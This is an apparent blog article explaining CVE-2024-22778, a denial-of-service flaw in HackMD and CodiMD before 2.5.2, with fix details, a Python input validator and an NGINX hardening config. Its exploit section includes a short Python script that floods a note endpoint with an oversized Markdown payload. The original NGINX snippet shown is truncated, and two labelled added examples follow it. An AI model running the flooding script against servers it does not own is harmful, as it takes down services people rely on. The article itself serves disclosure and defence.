HackMD and its open source fork CodiMD are popular collaborative Markdown editors used by teams, developers, and students all over the world. While these tools help people write documents together in real-time, they must remain secure and stable under all scenarios. Unfortunately, a Denial of Service (DoS) vulnerability—CVE-2024-22778—was found affecting all versions before 2.5.2. In this article, we’ll break down how this vulnerability works, how it can be exploited, and what you should do to protect yourself.
What Is CVE-2024-22778?
CVE-2024-22778 is a security flaw in CodiMD and HackMD’s code that makes it possible for a remote attacker to crash the server or render it unusable with a specially crafted request. This is called a “Denial of Service” (DoS) attack: instead of stealing data, the attacker just knocks your service offline!
According to the official advisory published on GitHub and the MITRE CVE database, this bug is triggered due to improper handling of certain user input. Specifically, untrusted data sent to the server could overload its resources (like memory or CPU), causing the service to hang or crash.
A Simple Explanation (What Happened?)
If you have an old HackMD or CodiMD server (any version before 2.5.2), an attacker can send a large and malicious input (for example, a huge Markdown document or nested data structure) to your server. Because the app doesn't properly limit or clean this input, it may take up all available memory or processor time, leading the process (and often the whole server) to become unresponsive.
Exploit Example: Easy Denial of Service
> Disclaimer: The following code is for educational purposes only. Never attack systems you do not own or have permission to test!
Attackers could use a script to submit a very large payload (a giant note, or a note with extreme nesting) to the endpoint that processes Markdown notes. Installations running 2.5.2 or later reject or safely handle such input.
Here's a Python example demonstrating the concept:

```python
import requests

# Replace this with the HackMD/CodiMD server you are authorised to test
url = "https://your.codimd.server/new"

# Craft a gigantic Markdown payload: a title followed by 100,000 list items
payload = "# Title\n" + "\n\n".join(["- item"] * 100000)

# Send the oversized payload; the generous timeout lets you observe whether
# the server hangs instead of answering
response = requests.post(
    url,
    data={"content": payload},
    timeout=60,
)
print("Status Code:", response.status_code)
```
In reality, an attacker might adjust payloads or endpoints (such as /api/notes/ or /sockets/) based on your deployment and CodiMD/HackMD version.
When this is done on a vulnerable instance, server memory or CPU skyrockets—sometimes crashing the Node.js process or causing a full stoppage of service until manually restarted.
Behind the Scenes: Why Was This Possible?
Early versions of CodiMD/HackMD had limited checks around the size and structure of incoming user input. For Markdown editors, handling user content is core to the app, so attackers could upload notes that are way bigger or more complex than any normal usage.
Modern web servers should always enforce limits—especially for user-generated content! Lack of such controls let this DoS condition happen in CodiMD/HackMD before 2.5.2.
The Fix
The vulnerability was patched in release 2.5.2:
- Input validation was added, rejecting too-large Markdown documents or deeply nested structures before they reach the parser.
- Safer error handling keeps the app up even when it receives carefully crafted input.
Check out the official patch and release notes for details.
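The kind of pre-parse check the fix describes, as an added example written for this article; it is not code taken from CodiMD or HackMD, and the byte limit, nesting limit, regexes and sample notes are assumptions constructed for the demonstration. The cheap byte-length check runs before any per-line work, so a body like the 100,000-item payload from the exploit section is rejected on size alone and never reaches the nesting scan or the Markdown parser.

```python
import re

# Illustrative limits (assumptions for this example, not CodiMD's real values)
MAX_BYTES = 256 * 1024     # reject notes larger than 256 KiB
MAX_NESTING = 32           # reject list/blockquote nesting deeper than this

# Leading spaces then a bullet ("-", "*", "+") or ordered marker ("1." / "1)")
_LIST_ITEM = re.compile(r"^( *)(?:[-*+]|\d+[.)]) ")
# One or more ">" markers, each optionally followed by a space
_BLOCKQUOTE = re.compile(r"^((?:> ?)+)")


def nesting_depth(markdown: str) -> int:
    """Deepest block-quote/list nesting seen on any single line.

    Each '>' counts as one level; for list items, every two leading spaces
    count as one level plus one for the item itself. This is a simplification
    of CommonMark's indentation rules, good enough for a pre-parse sanity check.
    """
    deepest = 0
    for line in markdown.splitlines():
        depth = 0
        m = _BLOCKQUOTE.match(line)
        if m:
            depth += m.group(1).count(">")
            line = line[m.end():]
        m = _LIST_ITEM.match(line)
        if m:
            depth += len(m.group(1)) // 2 + 1
        deepest = max(deepest, depth)
    return deepest


def validate_note(markdown: str,
                  max_bytes: int = MAX_BYTES,
                  max_nesting: int = MAX_NESTING) -> tuple[bool, str]:
    """Return (accepted, reason). Size is checked first because it is O(1)
    on the encoded length; the nesting scan is only run on bodies that pass."""
    size = len(markdown.encode("utf-8"))
    if size > max_bytes:
        return False, f"note is {size} bytes, limit is {max_bytes}"
    depth = nesting_depth(markdown)
    if depth > max_nesting:
        return False, f"nesting depth {depth} exceeds limit {max_nesting}"
    return True, "ok"


# Constructed sample inputs for the demonstration
NORMAL_NOTE = ("# Meeting notes\n\n- agenda\n  - item one\n  - item two\n\n"
               "> quoted remark\n")
HUGE_NOTE = "# Title\n" + "\n\n".join(["- item"] * 100000)  # same shape as the exploit payload
DEEP_NOTE = ">" * 100 + " deeply nested quote\n"

if __name__ == "__main__":
    for name, note in [("normal", NORMAL_NOTE), ("huge", HUGE_NOTE), ("deep", DEEP_NOTE)]:
        print(name, validate_note(note))
```

Run stand-alone, the normal note is accepted, the huge note is rejected for its 800,006-byte size without being scanned, and the deep note is rejected for nesting depth 100. In a real deployment the same check belongs in front of every path that accepts note content, not only the one the exploit script targets.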
What Should You Do?
- Upgrade immediately to HackMD/CodiMD version 2.5.2 or newer.
- If you are running an older version and can't upgrade yet, put a reverse proxy (such as NGINX) in front of the server to cap the maximum request body size, e.g.:

```nginx
...
}
```
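A complete server block of the kind the truncated snippet above refers to, added here as an example rather than taken from the original page or from the CodiMD/HackMD project. The hostname, certificate paths, upstream address, body-size values, rate and the endpoint pattern are all assumptions; tune them to the largest note your users legitimately create.

```nginx
# Added example (assumed values throughout), not the page's original snippet.
# One request-rate bucket per client IP for note-creating endpoints.
limit_req_zone $binary_remote_addr zone=codimd_notes:10m rate=10r/m;

server {
    listen 443 ssl;
    server_name codimd.example.org;              # assumption
    ssl_certificate     /etc/ssl/certs/codimd.pem;   # assumption
    ssl_certificate_key /etc/ssl/private/codimd.key; # assumption

    # Cap every request body; NGINX answers 413 before the body reaches Node.js
    client_max_body_size 1m;
    # Do not wait indefinitely for a slow client trickling an oversized body
    client_body_timeout 15s;

    location / {
        proxy_pass http://127.0.0.1:3000;        # assumed CodiMD upstream
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-Proto $scheme;
    }

    # Tighter limits on the paths that accept new note content
    location ~ ^/(new|api/notes) {
        client_max_body_size 512k;
        limit_req zone=codimd_notes burst=5 nodelay;
        proxy_pass http://127.0.0.1:3000;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
```

Whatever path your deployment uses for the realtime editor's WebSocket traffic must still be proxied with the usual Upgrade/Connection headers, and body limits on that path should be checked separately, since a proxy-level cap only covers what NGINX sees as an HTTP request body. Test with `nginx -t` before reloading.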
- Always keep all collaborative editing tools up to date. Subscribe to their GitHub or security mailing lists for alerts.
References
- CVE-2024-22778 on NIST NVD
- CodiMD/HackMD Security Advisory
- Patch Pull Request
- Release Notes 2.5.2
In Closing
Denial of Service vulnerabilities don’t steal your data, but they can keep you away from it—and even a small bug can have huge consequences. If you use HackMD or CodiMD for your team docs or class notes, don’t wait: update now and stay secure. Always keep watch for updates and keep your collaborative spaces safe!
Timeline
Published on: 02/21/2024 15:15:09 UTC
Last modified on: 11/06/2024 17:35:29 UTC